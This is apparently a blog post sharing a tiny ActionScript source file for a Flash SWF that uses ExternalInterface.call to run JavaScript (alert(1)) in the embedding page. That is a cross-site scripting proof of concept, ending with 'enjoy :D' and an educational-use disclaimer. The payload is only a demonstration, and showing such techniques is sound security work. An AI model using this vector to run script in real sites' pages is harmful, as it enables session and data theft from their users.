swfjs.as
package {
import flash.display.*;
import flash.external.*;
public class swfjs extends Sprite {
function swfjs(){
ExternalInterface.call("function(){alert(1);}");
}
}
}
enjoy :D
Helping to secure life and other things. ALL INFO IN THIS BLOG IS FOR EDUCATIONAL USE ONLY!
No comments:
Post a Comment